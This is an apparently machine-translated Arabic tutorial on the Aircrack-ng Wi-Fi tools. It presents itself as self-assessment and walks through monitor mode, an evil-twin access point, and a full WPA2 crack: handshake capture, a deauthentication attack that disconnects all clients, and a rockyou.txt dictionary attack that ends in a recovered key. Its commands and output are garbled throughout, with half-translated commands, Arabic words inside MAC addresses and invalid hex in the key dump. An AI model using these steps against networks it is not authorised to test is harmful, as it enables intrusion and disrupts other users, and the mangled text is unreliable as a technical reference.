كيفية استخدام Aircrack-ng

How Use Aircrack Ng



في معظم الأوقات ، لا يفكر الناس أبدًا في الشبكة التي يتصلون بها. إنهم لا يفكرون أبدًا في مدى أمان هذه الشبكة ومدى المخاطرة ببياناتهم السرية على أساس يومي. يمكنك إجراء عمليات فحص الثغرات الأمنية على شبكات wifi الخاصة بك باستخدام أداة قوية جدًا تسمى Aircrack-ng و Wireshark. يستخدم Wireshark لمراقبة نشاط الشبكة. Aircrack-ng هو أشبه بأداة قوية تتيح لك اختراق الاتصالات اللاسلكية وإتاحة الوصول إليها. لطالما كان التفكير كمتطفل هو الطريقة الأكثر أمانًا لحماية نفسك من الاختراق. قد تكون قادرًا على فهم الإجراءات الدقيقة التي سيتخذها المتسلل للوصول إلى نظامك من خلال التعرف على التكسير الجوي. يمكنك بعد ذلك إجراء فحوصات الامتثال على نظامك للتأكد من أنه ليس غير آمن.

Aircrack-ng عبارة عن مجموعة كاملة من البرامج المصممة لاختبار أمان شبكة WiFi. إنها ليست مجرد أداة واحدة ولكنها مجموعة من الأدوات ، كل منها يؤدي غرضًا معينًا. يمكن العمل على مجالات مختلفة من أمان wifi ، مثل مراقبة نقطة الوصول والاختبار ومهاجمة الشبكة وتكسير شبكة wifi واختبارها. الهدف الرئيسي من Aircrack هو اعتراض الحزم وفك رموز التجزئة لكسر كلمات المرور. وهو يدعم جميع الواجهات اللاسلكية الجديدة تقريبًا. Aircrack-ng هو نسخة محسنة من مجموعة أدوات قديمة Aircrack ، ng يشير إلى جيل جديد . بعض الأدوات الرائعة التي تعمل معًا للقيام بمهمة أكبر.







ايرمون:

يتم تضمين Airmon-ng في مجموعة aircrack-ng التي تضع بطاقة واجهة الشبكة في وضع الشاشة. تقبل بطاقات الشبكة عادةً فقط الحزم المستهدفة لها على النحو المحدد في عنوان MAC الخاص بـ NIC ، ولكن مع airmon-ng ، سيتم قبول جميع الحزم اللاسلكية ، سواء كانت مستهدفة لها أم لا. يجب أن تكون قادرًا على التقاط هذه الحزم دون الارتباط بنقطة الوصول أو المصادقة عليها. يتم استخدامه للتحقق من حالة نقطة الوصول عن طريق وضع واجهة الشبكة في وضع الشاشة. أولاً ، يتعين على المرء تكوين البطاقات اللاسلكية لتشغيل وضع الشاشة ، ثم قتل جميع عمليات الخلفية إذا كنت تعتقد أن أي عملية تتداخل معها. بعد إنهاء العمليات ، يمكن تمكين وضع المراقبة على الواجهة اللاسلكية عن طريق تشغيل الأمر أدناه:



[بريد إلكتروني محمي]: ~ $سودوairmon-ng يبدأ wlan0#

يمكنك أيضًا تعطيل وضع الشاشة عن طريق إيقاف airmon-ng في أي وقت باستخدام الأمر أدناه:

[بريد إلكتروني محمي]: ~ $سودوairmon-ng توقف wlan0#

ايرودومب:

يتم استخدام Airodump-ng لسرد جميع الشبكات المحيطة بنا ولعرض معلومات قيمة عنها. الوظيفة الأساسية لـ airodump-ng هي شم الحزم ، لذلك فهي مبرمجة بشكل أساسي للاستيلاء على جميع الحزم من حولنا أثناء وضعها في وضع الشاشة. سنقوم بتشغيله مقابل جميع الاتصالات من حولنا وجمع البيانات مثل عدد العملاء المتصلين بالشبكة ، وعناوين mac المقابلة لهم ، وأسلوب التشفير ، وأسماء القنوات ثم نبدأ في استهداف شبكتنا المستهدفة.

من خلال كتابة الأمر airodump-ng وإعطائه اسم واجهة الشبكة كمعامل ، يمكننا تنشيط هذه الأداة. سوف يسرد جميع نقاط الوصول ، وكمية حزم البيانات ، وطرق التشفير والمصادقة المستخدمة ، واسم الشبكة (ESSID). من وجهة نظر القرصنة ، تعد عناوين mac أهم الحقول.

[بريد إلكتروني محمي]: ~ $سودوايرودومب-نج wlx0mon

ايركراك:

يستخدم Aircrack لتكسير كلمة المرور. بعد التقاط جميع الحزم باستخدام airodump ، يمكننا كسر المفتاح عن طريق aircrack. يقوم بتكسير هذه المفاتيح باستخدام طريقتين PTW و FMS. يتم تنفيذ نهج PTW على مرحلتين. في البداية ، يتم استخدام حزم ARP فقط ، وعندها فقط ، إذا لم يتم كسر المفتاح بعد البحث ، فإنه يستخدم جميع الحزم الأخرى الملتقطة. النقطة الإضافية لنهج PTW هي أنه لا يتم استخدام جميع الحزم للتكسير. في النهج الثاني ، أي FMS ، نستخدم كل من النماذج الإحصائية و algos القوة الغاشمة لتكسير المفتاح. يمكن أيضًا استخدام طريقة القاموس.

Aireplay:

يقدم Airplay-ng الحزم إلى شبكة لاسلكية لإنشاء حركة المرور أو تسريعها. يمكن التقاط الحزم من مصدرين مختلفين عن طريق aireplay-ng. الأول هو الشبكة الحية ، والثاني هو الحزم من ملف pcap الموجود بالفعل. يعد Airplay-ng مفيدًا أثناء هجوم إلغاء المصادقة الذي يستهدف نقطة وصول لاسلكية ومستخدمًا. علاوة على ذلك ، يمكنك تنفيذ بعض الهجمات مثل هجوم قهوة لاتيه باستخدام airplay-ng ، وهي أداة تتيح لك الحصول على مفتاح من نظام العميل. يمكنك تحقيق ذلك عن طريق التقاط حزمة ARP ثم معالجتها وإرسالها مرة أخرى إلى النظام. سيقوم العميل بعد ذلك بإنشاء حزمة يمكن التقاطها بواسطة airodump ويقوم aircrack بتكسير المفتاح من تلك الحزمة المعدلة. تتضمن بعض خيارات هجوم airplay-ng الأخرى chopchop ، و fragment arepreplay ، وما إلى ذلك.

القاعدة الجوية:

يتم استخدام Airbase-ng لتحويل كمبيوتر الدخيل إلى نقطة اتصال مخترقة ليتمكن الآخرون من الارتباط بها. باستخدام Airbase-ng ، يمكنك الادعاء بأنك نقطة وصول قانونية وتقوم بهجمات man-in-the-middle على أجهزة الكمبيوتر المتصلة بشبكتك. تسمى هذه الأنواع من الهجمات هجمات الشر التوأم. من المستحيل على المستخدمين الأساسيين التمييز بين نقطة وصول قانونية ونقطة وصول مزيفة. لذا ، فإن تهديد التوأم الشرير هو من بين التهديدات اللاسلكية الأكثر تهديدًا التي نواجهها اليوم.

ايروليب-نغ:

يعمل Airolib على تسريع عملية القرصنة من خلال تخزين وإدارة قوائم كلمات المرور ونقطة الوصول. نظام إدارة قواعد البيانات المستخدم في هذا البرنامج هو SQLite3 ، وهو متوفر في الغالب على جميع الأنظمة الأساسية. يتضمن تكسير كلمة المرور حساب المفتاح الرئيسي الزوجي الذي يتم من خلاله استخراج المفتاح المؤقت الخاص (PTK). باستخدام PTK ، يمكنك تحديد رمز تعريف رسالة الإطار (MIC) لحزمة معينة والعثور نظريًا على MIC ليكون مشابهًا للحزمة ، لذلك إذا كان PTK صحيحًا ، فإن PMK كان على حق أيضًا.

للاطلاع على قوائم كلمات المرور وشبكات الوصول المخزنة في قاعدة البيانات ، اكتب الأمر التالي:

[بريد إلكتروني محمي]: ~ $سودوقاعدة بيانات اختبار airolib-ng

هنا قاعدة بيانات الاختبار هي قاعدة البيانات التي تريد الوصول إليها أو إنشائها ، و- ستات هي العملية التي تريد تنفيذها عليها. يمكنك إجراء عمليات متعددة في حقول قاعدة البيانات ، مثل إعطاء أولوية قصوى لبعض SSID أو شيء ما. لاستخدام airolib-ng مع aircrack-ng ، أدخل الأمر التالي:

[بريد إلكتروني محمي]: ~ $سودوaircrack- نانوغرام-rtestdatabase wpa2.eapol.cap

نحن هنا نستخدم ملفات PMK المحسوبة بالفعل والمخزنة في ملف قاعدة بيانات الاختبار لتسريع عملية تكسير كلمة المرور.

تكسير WPA / WPA2 باستخدام Aircrack-ng:

دعونا نلقي نظرة على مثال صغير لما يمكن أن يفعله aircrack-ng بمساعدة بعض أدواته الرائعة. سنقوم بكسر مفتاح مشترك مسبقًا لشبكة WPA / WPA2 باستخدام طريقة القاموس.

أول شيء يتعين علينا القيام به هو سرد واجهات الشبكة التي تدعم وضع الشاشة. يمكن القيام بذلك باستخدام الأمر التالي:

[بريد إلكتروني محمي]: ~ $سودوairmon- نانوغرام

شرائح سائق واجهة PHY

Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

يمكننا أن نرى واجهة. الآن ، يتعين علينا وضع واجهة الشبكة التي وجدناها (wlx0) في وضع الشاشة باستخدام الأمر التالي:

[بريد إلكتروني محمي]: ~ $سودوairmon-ng يبدأ wlx0

لقد مكّن وضع الشاشة على الواجهة المسماة wlx0mon .

الآن يجب أن نبدأ في الاستماع إلى عمليات البث بواسطة أجهزة التوجيه القريبة من خلال واجهة الشبكة التي وضعناها في وضع المراقبة.

[بريد إلكتروني محمي]: ~ $سودوايرودومب-نج wlx0mon

CH5 ][انقضى:30س][ 2020-12-02 00:17



منارات BSSID PWR# البيانات ، # / s CH MB ENC CIPHER AUTH ESSID



E4: 6F:13: 04: م:31 -أربعة خمسة 62 27 0 154e WPA2 CCMP PSK CrackIt

C4: E9:84:76:10:يكون-63 77 0 0 654 هـ. WPA2 CCMP PSK Hackme

C8:3A:35: أ 0: 4 هـ: 01-63 84 0 0 854e WPA2 CCMP PSK Net07

74: يعطي:88:FA:38: 02-68 28 2 0 أحد عشر54e WPA2 CCMP PSK TP-Link_3802



BSSID STATION PWR Rate Lost Frames Probe



E4: 6F:13: 04: م:315 ج: 3 أ:أربعة خمسة: D7: EA: 8B -3 0- 1e8 5

E4: 6F:13: 04: م:31C4:67: D3: C2: CD: D7 -331e- 6e0 3

E4: 6F:13: 04: م:315C:C3:07:56:61: إي أف -35 0-1 0 6

E4: 6F:13: 04: م:31قبل الميلاد:91:B5:F8:7E:D5 -390e-1 1002 13

شبكتنا المستهدفة هي الكراك في هذه الحالة ، التي تعمل حاليًا على القناة 1.

هنا من أجل كسر كلمة مرور الشبكة المستهدفة ، نحتاج إلى التقاط مصافحة رباعية الاتجاهات ، والتي تحدث عندما يحاول أحد الأجهزة الاتصال بشبكة. يمكننا التقاطه باستخدام الأمر التالي:

[بريد إلكتروني محمي]: ~ $سودوairodump- نانوغرام 1--bssid E4: 6F:13: 04: م:31 -في /المنزل wlx0

: قناة

–بسس : بسيد للشبكة المستهدفة

-في : اسم الدليل حيث سيتم وضع ملف pcap

الآن يتعين علينا انتظار اتصال الجهاز بالشبكة ، ولكن هناك طريقة أفضل لالتقاط المصافحة. يمكننا إلغاء مصادقة الأجهزة على AP باستخدام هجوم إلغاء المصادقة باستخدام الأمر التالي:

[بريد إلكتروني محمي]: ~ $سودوايربلاي- نغ-0 -إلىE4: 6F:13: 04: م:31

إلى : بسيد للشبكة المستهدفة

-0 : هجوم إلغاء المصادقة

لقد قمنا بفصل جميع الأجهزة ، وعلينا الآن انتظار اتصال الجهاز بالشبكة.

CH1 ][انقضى:30س][ 2020-12-02 00:02][مصافحة WPA: E4: 6F:13: 04: م:31



منارات BSSID PWR RXQ# البيانات ، # / s CH MB ENC CIPHER AUTH E



E4: 6F:13: 04: م:31 -47 1 228 807 36 1رقم 54 من WPA2 CCMP PSK P



BSSID STATION PWR Rate Lost Frames Probe



E4: 6F:13: 04: م:31قبل الميلاد:91:B5:F8:7E:D5 -35 0-1 0 1

E4: 6F:13: 04: م:315 ج: 3 أ:أربعة خمسة: D7: EA: 8B -290e- 1e0 22

E4: 6F:13: 04: م:31 88:28: B3:30:27:7E -310e-1 0 32

E4: 6F:13: 04: م:31C4:67: D3: C2: CD: D7 -350e- 6e263 708الكراك

E4: 6F:13: 04: م:31D4: 6A: 6A:99: ED: E3 -350e- 0e0 86

E4: 6F:13: 04: م:315C:C3:07:56:61: إي أف -37 0- 1e0 1

لقد حصلنا على ضربة ، وبالنظر إلى الزاوية اليمنى العليا بجوار الوقت ، يمكننا أن نرى تم التقاط مصافحة. الآن ابحث في المجلد المحدد ( /الصفحة الرئيسية في حالتنا) ل .pcap ملف.

من أجل كسر مفتاح WPA ، يمكننا استخدام الأمر التالي:

[بريد إلكتروني محمي]: ~ $سودوaircrack- نانوغرام-a2 -فيrockyou.txtE4: 6F:13: 04: م:31المصافحة

ب: بسيد للشبكة المستهدفة

-a2: وضع WPA2

Rockyou.txt: القاموسملفتستخدم

المصافحة. cap: Theملف أييحتوي على مصافحة تم التقاطها

Aircrack-ng1.2beta3

[00:01:49] 10566مفاتيح اختبارها(1017.96إلى/س)

مفتاح وجدت! [فهمتني]

المفتاح الرئيسي: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B 7B 6D

0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6Fخمسونج


مفتاح عابر: 4D C4 5R 6T76 996G 7H 8D EC

H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896 ب

A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089

8D EC 0C EA D2 BC 6B H7 J8 K1 A0896 ب

MAC: CB 5A F8 CE62B2 1B F7 6FخمسونC025 62E9 5D71

تم اختراق مفتاح شبكتنا المستهدفة بنجاح.

استنتاج:

الشبكات اللاسلكية منتشرة في كل مكان ، تستخدمها كل شركة ، من العاملين الذين يستخدمون الهواتف الذكية إلى أجهزة التحكم الصناعية. وفقًا للبحث ، سيكون ما يقرب من 50 في المائة من حركة مرور الإنترنت عبر شبكة WiFi في عام 2021. تتمتع الشبكات اللاسلكية بالعديد من المزايا ، والتواصل خارج الأبواب ، والوصول السريع إلى الإنترنت في الأماكن التي يكاد يكون من المستحيل فيها وضع الأسلاك ، ويمكن توسيع الشبكة دون تثبيت الكابلات لأي مستخدم آخر ، ويمكنه بسهولة توصيل أجهزتك المحمولة بمكاتب منزلك أثناء عدم وجودك هناك.

على الرغم من هذه المزايا ، هناك علامة استفهام كبيرة حول خصوصيتك وأمانك. مثل هذه الشبكات ؛ ضمن نطاق الإرسال لأجهزة التوجيه مفتوحة للجميع ، ويمكن بسهولة مهاجمتها ، ويمكن بسهولة اختراق بياناتك. على سبيل المثال ، إذا كنت متصلاً بشبكة wifi عامة ، فيمكن لأي شخص متصل بهذه الشبكة التحقق بسهولة من حركة مرور الشبكة باستخدام بعض المعلومات الذكية وبمساعدة الأدوات الرائعة المتاحة وحتى التخلص منها.